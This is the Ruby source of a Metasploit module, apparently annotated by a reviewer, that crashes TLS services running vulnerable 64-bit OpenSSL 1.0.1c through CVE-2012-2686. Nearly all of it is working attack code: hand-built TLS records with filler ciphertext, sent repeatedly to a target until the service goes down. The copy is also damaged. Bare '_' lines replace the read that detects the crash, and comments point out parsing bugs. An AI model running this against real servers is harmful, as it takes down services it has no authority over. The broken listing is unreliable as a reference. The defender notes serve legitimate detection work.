GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/ssl/openssl_aesni.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# auxiliary/dos/ssl/openssl_aesni
# Auxiliary DoS check for CVE-2012-2686 (OpenSSL AES-NI CBC/HMAC-SHA1 length
# handling with TLS 1.1 and above, per the module description below).
#
# The module speaks raw TLS records over a TCP socket: it sends a fixed
# Client Hello, reads the cipher suite the server selected, then sends a
# matching Client Key Exchange + Change Cipher Spec + "encrypted" handshake
# record made of filler bytes. Stability is declared CRASH_SERVICE_DOWN, i.e.
# a successful run takes the target TLS service down.
#
# Defender notes: every field of the Client Hello is constant (including a
# 32-byte random of 'A' characters), so the traffic has a static signature
# that a network sensor can match. Fixed OpenSSL releases are listed in the
# advisory referenced under 'References'.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and options.
  #
  # Options: RPORT (default 443) and MAX_TRIES (required integer, default 300),
  # which bounds the retry loop in #run.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',
        'Description' => %q{
          The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the
          length of an encrypted message when used with a TLS version 1.1 or above. This
          leads to an integer underflow which can cause a DoS. The vulnerable function
          aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.
          This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default
          OpenSSL 1.0.1c package.
        },
        'Author' => [
          'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-2686'],
          [ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
        ],
        'DisclosureDate' => '2013-02-05',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptInt.new('MAX_TRIES', [true, 'Maximum number of tries', 300])
      ]
    )
  end

  # Builds the static TLS records once, then repeatedly connects and replays
  # them until the peer closes the connection (EOFError) or the tries run out.
  #
  # The length fields in the records below are hard-coded and must stay in
  # step with the bytes that follow them; the trailing comments give each
  # field's decoded value.
  def run
    # Client Hello
    p1 = "\x16" # Content Type: Handshake
    p1 << "\x03\x01" # Version: TLS 1.0
    p1 << "\x00\x7e" # Length: 126
    p1 << "\x01" # Handshake Type: Client Hello
    p1 << "\x00\x00\x7a" # Length: 122
    p1 << "\x03\x02" # Version: TLS 1.1
    p1 << ('A' * 32) # Random (constant filler, not random data)
    p1 << "\x00" # Session ID Length: 0
    p1 << "\x00\x08" # Cipher Suites Length: 8 (four 2-byte entries)
    p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
    p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
    p1 << "\x00\x35" # - AES256-SHA
    p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
    p1 << "\x01" # Compression Methods Length: 1
    p1 << "\x00" # - NULL-Compression
    p1 << "\x00\x49" # Extensions Length: 73
    p1 << "\x00\x0b" # - Extension: ec_point_formats
    p1 << "\x00\x04" # Length: 4
    p1 << "\x03" # EC Points Format Length: 3
    p1 << "\x00" # - uncompressed
    p1 << "\x01" # - ansiX962_compressed_prime
    p1 << "\x02" # - ansiX962_compressed_char2
    p1 << "\x00\x0a" # - Extension: elliptic_curves
    p1 << "\x00\x34" # Length: 52
    p1 << "\x00\x32" # Elliptic Curves Length: 50
    # 25 Elliptic curves:
    p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
    p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
    p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
    p1 << "\x00\x11"

    p1 << "\x00\x23" # - Extension: SessionTicket TLS
    p1 << "\x00\x00" # Length: 0
    p1 << "\x00\x0f" # - Extension: Heartbeat
    p1 << "\x00\x01" # Length: 1
    p1 << "\x01" # Peer allowed to send requests

    # Change Cipher Spec Message
    p2_cssm = "\x14" # Content Type: Change Cipher Spec
    p2_cssm << "\x03\x02" # Version: TLS 1.1
    p2_cssm << "\x00\x01" # Length: 1
    p2_cssm << "\x01" # Change Cipher Spec Message

    # Encrypted Handshake Message
    p2_ehm = "\x16" # Content Type: Handshake
    p2_ehm << "\x03\x02" # Version: TLS 1.1
    p2_ehm << "\x00\x40" # Length: 64
    p2_ehm << ('A' * 64) # Encrypted Message (filler bytes, not real ciphertext)

    # Client Key Exchange, Change Cipher Spec, Encrypted Handshake
    # One variant per cipher suite offered in the Client Hello; each is the
    # key-exchange record followed by the shared p2_cssm and p2_ehm records.
    # AES256-SHA
    p2_aes_sha = "\x16" # Content Type: Handshake
    p2_aes_sha << "\x03\x02" # Version: TLS 1.1
    p2_aes_sha << "\x01\x06" # Length: 262
    p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
    p2_aes_sha << "\x00\x01\x02" # Length: 258
    p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
    p2_aes_sha << ("\x00" * 256) # Encrypted PreMaster (irrelevant)
    p2_aes_sha << p2_cssm # Change Cipher Spec Message
    p2_aes_sha << p2_ehm # Encrypted Handshake Message

    # DHE-RSA-AES256-SHA
    p2_dhe = "\x16" # Content Type: Handshake
    p2_dhe << "\x03\x02" # Version: TLS 1.1
    p2_dhe << "\x00\x46" # Length: 70
    p2_dhe << "\x10" # Handshake Type: Client Key Exchange
    p2_dhe << "\x00\x00\x42" # Length: 66
    p2_dhe << "\x00\x40" # DH Pubkey Length: 64
    p2_dhe << ('A' * 64) # DH Pubkey
    p2_dhe << p2_cssm # Change Cipher Spec Message
    p2_dhe << p2_ehm # Encrypted Handshake Message

    # ECDHE-RSA-AES128-SHA
    p2_ecdhe = "\x16" # Content Type: Handshake
    p2_ecdhe << "\x03\x02" # Version: TLS 1.1
    p2_ecdhe << "\x00\x46" # Length: 70
    p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
    p2_ecdhe << "\x00\x00\x42" # Length: 66
    p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
    # EC DH Pubkey:
    p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
    p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
    p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
    p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"
    p2_ecdhe << "\x40"
    p2_ecdhe << p2_cssm # Change Cipher Spec Message
    p2_ecdhe << p2_ehm # Encrypted Handshake Message

    maxtries = datastore['MAX_TRIES']

    success = false

    # The range is inclusive, so the loop runs MAX_TRIES + 1 times at most.
    for i in 0..maxtries
      print_status("Try \##{i}")

      connect

      sock.put(p1)
      resp = sock.get_once

      # NOTE(review): resp is passed on unchecked; presumably get_once can
      # return nil when nothing is received, which get_cipher_suite does not
      # handle — confirm.
      cs = get_cipher_suite(resp)

      # Pick the second flight that matches the suite the server selected.
      if cs == 0xc013 # ECDHE-RSA-AES128-SHA
        p2 = p2_ecdhe
      elsif cs == 0x0039 # DHE-RSA-AES256-SHA
        p2 = p2_dhe
      elsif cs == 0x0035 # AES256-SHA
        p2 = p2_aes_sha
      else
        # Also reached when get_cipher_suite returns nil.
        # NOTE(review): this path returns without calling disconnect.
        print_error('No common ciphers!')
        return
      end

      sock.put(p2)

      # NOTE(review): the bare `_` here and inside the begin block is all this
      # listing shows; the statement that can raise EOFError is not visible in
      # this copy — compare with the upstream file before relying on it.
      _

      begin
        _
      rescue EOFError
        # The peer closed the connection, which the module reports as the
        # service having gone down.
        print_good("DoS successful. process on #{rhost} did not respond.")
        success = true
        break
      end

      disconnect

    end

    if success == false
      print_error('DoS unsuccessful.')
    end
  end

  # Scans the server's reply for a Server Hello and returns the cipher suite
  # it selected as a 16-bit integer.
  #
  # resp is the raw bytes read from the socket. Returns nil when a record is
  # not of type Handshake (22), or when the loop ends without finding a
  # Server Hello.
  def get_cipher_suite(resp)
    offset = 0

    while offset < resp.length
      type = (resp[offset, 1]).unpack('C')[0]

      if type != 22 # Handshake
        return nil
      end

      # Record length is the big-endian 16-bit value at bytes 3-4 of the
      # record header; the handshake type is the first byte after the header.
      len = (resp[offset + 3, 2]).unpack('n')[0]
      hstype = (resp[offset + 5, 1]).unpack('C')[0]

      if hstype == 2 # Server Hello
        # Fixed offset 44 = 5 (record header) + 4 (handshake header) +
        # 2 (version) + 32 (random) + 1 (session ID length byte).
        # NOTE(review): presumably this assumes a zero-length session ID in
        # the Server Hello — confirm.
        return (resp[offset + 44, 2]).unpack('n')[0]
      end

      # NOTE(review): len is the record body length, but the body starts at
      # offset + 5, so advancing by len alone does not appear to land on the
      # next record header. A truncated resp would also make the slices above
      # return nil — confirm both against the intended behaviour.
      offset += len
    end
  end
end